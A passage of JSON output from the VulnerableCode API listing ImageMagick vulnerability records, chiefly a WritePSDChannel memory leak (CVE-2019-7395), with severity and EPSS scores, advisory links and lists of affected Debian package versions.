"VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2021-3610" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-my2x-tnvf-wqbw" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/82843?format=api", "vulnerability_id": "VCID-n22y-f9az-fubm", "summary": "ImageMagick: Memory leak in the WritePSDChannel function in coders/psd.c", "references": [ { "reference_url": "http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00034.html", "reference_id": "", "reference_type": "", "scores": [], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00034.html" }, { "reference_url": "http://lists.opensuse.org/opensuse-security-announce/2019-05/msg00006.html", "reference_id": "", "reference_type": "", "scores": [], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-05/msg00006.html" }, { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-7395.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-7395.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2019-7395", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.03348", "scoring_system": "epss", "scoring_elements": "0.87264", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.03348", "scoring_system": "epss", "scoring_elements": "0.87347", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.03348", "scoring_system": "epss", "scoring_elements": "0.87331", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.03348", "scoring_system": "epss", "scoring_elements": "0.87335", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.03348", "scoring_system": "epss", "scoring_elements": "0.8733", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.03348", "scoring_system": "epss", "scoring_elements": "0.87274", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.03348", "scoring_system": "epss", "scoring_elements": "0.8729", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.03348", "scoring_system": "epss", "scoring_elements": "0.87288", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.03348", "scoring_system": "epss", "scoring_elements": "0.87307", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.03348", "scoring_system": "epss", "scoring_elements": "0.87314", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.03348", "scoring_system": "epss", "scoring_elements": "0.87327", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.03348", "scoring_system": "epss", "scoring_elements": "0.87321", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.03348", "scoring_system": "epss", "scoring_elements": "0.87317", "published_at": "2026-04-13T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2019-7395" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/commit/8a43abefb38c5e29138e1c9c515b313363541c06", "reference_id": "", "reference_type": "", "scores": [], "url": "https://github.com/ImageMagick/ImageMagick/commit/8a43abefb38c5e29138e1c9c515b313363541c06" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/issues/1451", "reference_id": "", "reference_type": "", "scores": [], "url": "https://github.com/ImageMagick/ImageMagick/issues/1451" }, { "reference_url": "https://www.debian.org/security/2020/dsa-4712", "reference_id": "", "reference_type": "", "scores": [], "url": "https://www.debian.org/security/2020/dsa-4712" }, { "reference_url": "http://www.securityfocus.com/bid/106850", "reference_id": "", "reference_type": "", "scores": [], "url": "http://www.securityfocus.com/bid/106850" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1672576", "reference_id": "1672576", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1672576" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "reference_id": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "reference_id": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "reference_id": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:18.10:*:*:*:*:*:*:*", "reference_id": "cpe:2.3:o:canonical:ubuntu_linux:18.10:*:*:*:*:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:18.10:*:*:*:*:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*", "reference_id": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "reference_id": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*", "reference_id": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2019-7395", "reference_id": "CVE-2019-7395", "reference_type": "", "scores": [ { "value": "5.0", "scoring_system": "cvssv2", "scoring_elements": "AV:N/AC:L/Au:N/C:N/I:N/A:P" }, { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-7395" }, { "reference_url": "https://usn.ubuntu.com/4034-1/", "reference_id": "USN-4034-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4034-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1037804?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.10.23%2Bdfsg-2.1%2Bdeb10u1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-12rd-dhh3-h3ea" }, { "vulnerability": "VCID-152y-9pjj-p7b7" }, { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-18rv-b2mg-jbex" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2dgn-j4dn-9fcd" }, { "vulnerability": "VCID-2dwv-ndt5-gfg2" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2m38-vt4m-5ffa" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-3bbh-2exn-m7ac" }, { "vulnerability": "VCID-3qad-mewf-8khz" }, { "vulnerability": "VCID-3zbe-p6ue-ffe8" }, { "vulnerability": "VCID-41xr-8ryd-z3ew" }, { "vulnerability": "VCID-453d-2nac-jbdc" }, { "vulnerability": "VCID-46ey-s7sy-9qby" }, { "vulnerability": "VCID-4az8-8361-7bg2" }, { "vulnerability": "VCID-4f97-2smu-6qfc" }, { "vulnerability": "VCID-4s25-p8ea-zkh7" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-56xz-svu7-eue2" }, { "vulnerability": "VCID-5a4x-wwha-pufn" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-6279-tc7g-g3ag" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-68kj-s42g-effd" }, { "vulnerability": "VCID-6bf2-uh5z-kfg7" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6vvv-g1fm-4bdn" }, { "vulnerability": "VCID-6y99-sgwe-tygw" }, { "vulnerability": "VCID-6zuv-uh18-k3c1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gya-qyjx-qqfx" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-7yur-twpa-n3e1" }, { "vulnerability": "VCID-834e-c7gn-afac" }, { "vulnerability": "VCID-8yfc-gunh-17a2" }, { "vulnerability": "VCID-92es-dtbz-tqae" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-9h1k-h8gw-hkat" }, { "vulnerability": "VCID-acgu-hc83-yubn" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-aej5-sgf8-7uhp" }, { "vulnerability": "VCID-agz5-g8mr-e7hn" }, { "vulnerability": "VCID-anh4-1hmn-yfh8" }, { "vulnerability": "VCID-aqs4-r36j-ffe7" }, { "vulnerability": "VCID-ay8n-59tt-k7cp" }, { "vulnerability": "VCID-b32k-mwuv-hfeq" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-b8hx-6u4j-b3dc" }, { "vulnerability": "VCID-bcy4-phg3-w3fq" }, { "vulnerability": "VCID-bky2-hjpj-67ag" }, { "vulnerability": "VCID-c8rr-y6zy-h7h5" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-ccbh-689z-6kg2" }, { "vulnerability": "VCID-cmym-m1da-f3fg" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-cure-qgzj-8qfu" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-djqz-f6k5-fqfj" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-ezcj-2yaf-rfhh" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-fzhr-jhhc-m3ej" }, { "vulnerability": "VCID-g1ct-6d28-g3ab" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gc9p-4vdm-rbah" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-gf8v-mmd7-hqag" }, { "vulnerability": "VCID-gp36-v664-vuh2" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-h7em-v8x6-63e3" }, { "vulnerability": "VCID-hrrw-ufje-akg5" }, { "vulnerability": "VCID-hwcd-dj3f-guay" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jpxf-qevp-kycp" }, { "vulnerability": "VCID-jqv2-v42r-7ybf" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-kfb4-xnqr-cya6" }, { "vulnerability": "VCID-mhbe-8x14-f3d6" }, { "vulnerability": "VCID-mmw7-4m3z-2kcn" }, { "vulnerability": "VCID-mn5y-2hmf-dkgy" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-my2x-tnvf-wqbw" }, { "vulnerability": "VCID-n22y-f9az-fubm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-neaa-39c7-sfbc" }, { "vulnerability": "VCID-nvea-drm5-h3au" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-nxfx-jh82-vud3" }, { "vulnerability": "VCID-p3vh-b6jn-f3e2" }, { "vulnerability": "VCID-p4yb-mqca-v7c8" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-p6m5-ntbm-auct" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-pj8s-qad1-6qdu" }, { "vulnerability": "VCID-pjm4-2g47-4qau" }, { "vulnerability": "VCID-pk4j-w1q9-vqd2" }, { "vulnerability": "VCID-pmpn-drv8-9ude" }, { "vulnerability": "VCID-psf6-cvdn-h3b1" }, { "vulnerability": "VCID-ptej-pfyn-z3aq" }, { "vulnerability": "VCID-q3v4-jztv-9bbs" }, { "vulnerability": "VCID-qda9-n7gh-c7c4" }, { "vulnerability": "VCID-qrqm-h5se-1kep" }, { "vulnerability": "VCID-r1uc-e1w7-kyda" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-rqdx-1pdv-a3bu" }, { "vulnerability": "VCID-rqm7-d751-myfa" }, { "vulnerability": "VCID-rrvd-vd81-sfdm" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-rvjq-uks4-x3h3" }, { "vulnerability": "VCID-rzge-64xp-bfej" }, { "vulnerability": "VCID-s7tx-uu27-xqb5" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-snup-2hn7-sue2" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-swqu-wape-83bj" }, { "vulnerability": "VCID-sy2v-5ufy-sfc4" }, { "vulnerability": "VCID-t2pe-etah-1bh3" }, { "vulnerability": "VCID-tc3z-912z-afc8" }, { "vulnerability": "VCID-tm56-q7ka-ukft" }, { "vulnerability": "VCID-tn11-bwg6-m3e3" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-twq8-ntkg-zbfk" }, { "vulnerability": "VCID-u6vb-tewy-fkda" }, { "vulnerability": "VCID-u9gb-ppd4-3fd5" }, { "vulnerability": "VCID-ucfp-qqy4-jqdm" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-uwq6-h2du-dkdn" }, { "vulnerability": "VCID-v2r8-1wgn-1bgs" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vf3u-cgrx-a7d7" }, { "vulnerability": "VCID-vgvf-at1z-8ydr" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-vrqg-4fke-mfay" }, { "vulnerability": "VCID-wpsv-h9q7-pyep" }, { "vulnerability": "VCID-wwcs-2mw8-4bbr" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-x95w-ad3j-n7aj" }, { "vulnerability": "VCID-x998-fhs5-93ht" }, { "vulnerability": "VCID-xnkt-e7mn-e7du" }, { "vulnerability": "VCID-xsue-s6sg-aqff" }, { "vulnerability": "VCID-xtfv-8vvu-qudb" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yhmq-s1jh-17bh" }, { "vulnerability": "VCID-yspe-wj34-juck" }, { "vulnerability": "VCID-ytpg-f9mm-sbev" }, { "vulnerability": "VCID-yub2-x8z7-d3e6" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zdu5-rtg2-pffb" }, { "vulnerability": "VCID-zh44-pz7k-abba" }, { "vulnerability": "VCID-zp6q-98qj-ykh1" }, { "vulnerability": "VCID-zv8w-puzj-23cd" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.10.23%252Bdfsg-2.1%252Bdeb10u1" }, { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { 